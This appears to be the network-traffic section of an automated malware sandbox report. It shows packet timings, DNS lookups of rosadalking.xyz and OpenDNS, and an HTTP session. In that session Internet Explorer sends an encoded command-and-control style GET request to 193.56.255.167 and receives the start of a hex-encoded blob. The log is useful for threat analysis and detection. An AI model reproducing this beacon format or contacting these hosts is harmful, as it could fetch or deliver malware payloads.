Dec 16, 2020 11:07:34.721270084 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721290112 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721302032 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721313953 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721330881 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721338034 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721369982 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.721394062 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.721529961 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721568108 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721579075 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721591949 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721610069 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721626997 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721661091 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.721678972 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.721812963 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721870899 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721884012 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721926928 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721982956 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722014904 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722014904 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722029924 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722067118 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722084045 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722084999 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722110033 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722136021 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722209930 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722228050 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722239017 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722250938 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722266912 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722280979 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722290993 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722300053 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722316027 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722317934 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722323895 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722341061 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722361088 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722369909 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722373962 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722390890 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722394943 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722407103 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722414970 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722426891 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722426891 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722439051 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722445965 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722456932 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722469091 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722476006 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722503901 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722518921 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722543001 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722563982 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722575903 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722588062 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722611904 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722615957 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722619057 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722657919 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722676039 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722709894 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722723007 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722743988 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722754955 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722809076 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722860098 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722882032 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722893953 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722906113 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722922087 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722933054 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.722956896 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.722976923 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723242998 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723304033 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723330975 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723359108 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723371983 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723413944 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723439932 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723479033 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723490953 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723522902 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723527908 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723558903 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723601103 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723639011 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723655939 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723665953 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723704100 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723716974 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723743916 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723756075 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723776102 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723794937 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723814011 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723860979 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723862886 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723891973 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723931074 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723969936 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.723984003 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.723997116 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724036932 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724075079 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724092007 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724101067 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724128008 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724148035 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724190950 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724215984 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724253893 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724270105 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724293947 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724298000 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724319935 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724359035 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724396944 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724415064 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724432945 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724474907 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724513054 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724534988 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724539042 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724561930 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724576950 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724606991 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.724627972 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.724668026 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:35.589052916 CET	49742	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:35.589092016 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.532176018 CET	49744	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.532939911 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.691391945 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.691514969 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.692709923 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.693162918 CET	80	49744	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.693270922 CET	49744	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.851037025 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.878608942 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.878638983 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.878652096 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.878665924 CET	80	49745	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:36.878804922 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:36.878843069 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:37.808757067 CET	49744	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:37.808831930 CET	49745	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:08:13.785629988 CET	49748	80	192.168.2.5	89.44.9.160
Dec 16, 2020 11:08:14.787828922 CET	49748	80	192.168.2.5	89.44.9.160
Dec 16, 2020 11:08:16.803678036 CET	49748	80	192.168.2.5	89.44.9.160
Dec 16, 2020 11:09:21.151415110 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.167741060 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.168711901 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.173933983 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.190160036 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.197501898 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.197544098 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.197563887 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.197686911 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.208385944 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.208628893 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.224663019 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.224704981 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.224848986 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.224953890 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.225028992 CET	443	49761	216.58.210.2	192.168.2.5
Dec 16, 2020 11:09:21.225413084 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:21.225555897 CET	49761	443	192.168.2.5	216.58.210.2
Dec 16, 2020 11:09:31.273989916 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.297828913 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:31.298371077 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.301923037 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.325535059 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:31.327621937 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:31.327815056 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.703747034 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.727857113 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:31.728378057 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.729054928 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.729150057 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:31.752496004 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:31.752528906 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.280132055 CET	443	49762	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.282520056 CET	49762	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.286338091 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.309734106 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.310471058 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.315571070 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.338922977 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.339422941 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.341032982 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.342320919 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.353560925 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.353604078 CET	49764	443	192.168.2.5	185.156.172.54
Dec 16, 2020 11:09:32.377032042 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.416549921 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.917404890 CET	443	49764	185.156.172.54	192.168.2.5
Dec 16, 2020 11:09:32.917534113 CET	49764	443	192.168.2.5	185.156.172.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2020 11:06:16.982721090 CET	54757	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:17.006818056 CET	53	54757	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:18.007472038 CET	49992	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:18.034950972 CET	53	49992	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:18.668729067 CET	60075	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:18.696346998 CET	53	60075	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:20.347103119 CET	55016	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:20.371599913 CET	53	55016	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:26.753907919 CET	64345	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:26.787731886 CET	53	64345	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:27.944221020 CET	57128	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:27.984978914 CET	53	57128	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:28.260732889 CET	54791	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:28.284965038 CET	53	54791	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:40.475138903 CET	50463	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:40.512238979 CET	53	50463	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:45.721254110 CET	50394	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:45.745930910 CET	53	50394	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:56.776324034 CET	58530	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:56.800721884 CET	53	58530	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:57.783565044 CET	58530	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:57.808008909 CET	53	58530	8.8.8.8	192.168.2.5
Dec 16, 2020 11:06:58.797499895 CET	58530	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:06:58.821789980 CET	53	58530	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:00.798271894 CET	58530	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:00.825553894 CET	53	58530	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:02.179029942 CET	53813	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:02.227056980 CET	53	53813	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:04.813555956 CET	58530	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:04.837922096 CET	53	58530	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:06.249392986 CET	63732	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:06.285053968 CET	53	63732	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:10.520185947 CET	57344	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:10.544547081 CET	53	57344	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:14.163996935 CET	54450	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:14.198071003 CET	53	54450	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:29.952574968 CET	59261	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:29.989494085 CET	53	59261	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:30.936115026 CET	57151	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:30.969042063 CET	53	57151	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:33.682895899 CET	59413	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:33.715981960 CET	53	59413	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:36.485580921 CET	60516	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:36.520401001 CET	53	60516	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:50.510822058 CET	51649	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:50.537307024 CET	53	51649	8.8.8.8	192.168.2.5
Dec 16, 2020 11:07:53.466568947 CET	65086	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:07:53.502234936 CET	53	65086	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:11.284570932 CET	56432	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:11.311702967 CET	53	56432	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:14.322539091 CET	56436	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:14.346740007 CET	53	56436	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:14.347363949 CET	56437	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:14.374279022 CET	53	56437	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:54.654793024 CET	52929	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:54.690710068 CET	53	52929	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:55.266450882 CET	64317	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:55.299174070 CET	53	64317	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:55.700527906 CET	61004	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:55.733355045 CET	53	61004	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:56.024903059 CET	56895	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:56.061182976 CET	53	56895	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:56.893362045 CET	62372	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:56.930087090 CET	53	62372	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:57.471968889 CET	61515	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:57.496289968 CET	53	61515	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:58.030520916 CET	56675	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:58.066097021 CET	53	56675	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:58.488779068 CET	57172	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:58.513003111 CET	53	57172	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:59.310813904 CET	55267	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:59.348217964 CET	53	55267	8.8.8.8	192.168.2.5
Dec 16, 2020 11:08:59.853591919 CET	50969	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:08:59.890151978 CET	53	50969	8.8.8.8	192.168.2.5
Dec 16, 2020 11:09:08.970041990 CET	64362	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:09:09.004652977 CET	53	64362	8.8.8.8	192.168.2.5
Dec 16, 2020 11:09:20.902687073 CET	54766	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:09:20.943363905 CET	53	54766	8.8.8.8	192.168.2.5
Dec 16, 2020 11:09:21.105087042 CET	61446	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:09:21.148797035 CET	53	61446	8.8.8.8	192.168.2.5
Dec 16, 2020 11:09:31.524790049 CET	57515	53	192.168.2.5	8.8.8.8
Dec 16, 2020 11:09:31.560095072 CET	53	57515	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 16, 2020 11:07:30.936115026 CET	192.168.2.5	8.8.8.8	0x4695	Standard query (0)	rosadalking.xyz	A (IP address)	IN (0x0001)
Dec 16, 2020 11:07:33.682895899 CET	192.168.2.5	8.8.8.8	0x6939	Standard query (0)	rosadalking.xyz	A (IP address)	IN (0x0001)
Dec 16, 2020 11:07:36.485580921 CET	192.168.2.5	8.8.8.8	0xdfc	Standard query (0)	rosadalking.xyz	A (IP address)	IN (0x0001)
Dec 16, 2020 11:08:11.284570932 CET	192.168.2.5	8.8.8.8	0x5b36	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Dec 16, 2020 11:08:14.322539091 CET	192.168.2.5	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Dec 16, 2020 11:08:14.347363949 CET	192.168.2.5	8.8.8.8	0x2	Standard query (0)	1.0.0.127.in-addr.arpa	PTR (Pointer record)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 16, 2020 11:07:30.969042063 CET	8.8.8.8	192.168.2.5	0x4695	No error (0)	rosadalking.xyz		193.56.255.167	A (IP address)	IN (0x0001)
Dec 16, 2020 11:07:33.715981960 CET	8.8.8.8	192.168.2.5	0x6939	No error (0)	rosadalking.xyz		193.56.255.167	A (IP address)	IN (0x0001)
Dec 16, 2020 11:07:36.520401001 CET	8.8.8.8	192.168.2.5	0xdfc	No error (0)	rosadalking.xyz		193.56.255.167	A (IP address)	IN (0x0001)
Dec 16, 2020 11:08:11.311702967 CET	8.8.8.8	192.168.2.5	0x5b36	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Dec 16, 2020 11:08:14.346740007 CET	8.8.8.8	192.168.2.5	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Dec 16, 2020 11:08:14.374279022 CET	8.8.8.8	192.168.2.5	0x2	Name error (3)	1.0.0.127.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Dec 16, 2020 11:09:21.148797035 CET	8.8.8.8	192.168.2.5	0x4160	No error (0)	pagead46.l.doubleclick.net		216.58.210.2	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

rosadalking.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49740	193.56.255.167	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 16, 2020 11:07:31.141976118 CET	4661	OUT	GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: rosadalking.xyz Connection: Keep-Alive
Dec 16, 2020 11:07:31.336008072 CET	4662	IN	HTTP/1.1 200 OK Date: Wed, 16 Dec 2020 10:07:31 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; path=/; domain=.rosadalking.xyz Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: lang=en; expires=Fri, 15-Jan-2021 10:07:31 GMT; path=/; domain=.rosadalking.xyz Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 33 38 64 62 34 0d 0a 43 77 4a 6d 4f 63 4d 77 6f 79 75 64 45 59 38 5a 2b 58 77 30 74 69 2b 76 43 4f 34 57 70 48 39 78 30 6a 56 55 76 72 78 75 72 4e 53 4d 43 6f 38 4e 54 59 38 4a 7a 42 73 65 71 4c 76 69 39 44 4a 43 47 65 4f 6d 6d 58 56 31 4a 36 37 43 68 45 34 72 48 36 41 46 35 54 72 39 67 31 2b 6d 42 6f 68 4d 55 5a 70 36 67 75 65 79 50 45 56 2f 70 61 6e 51 6d 71 36 52 53 38 51 46 76 46 44 46 72 41 72 4d 44 2f 47 42 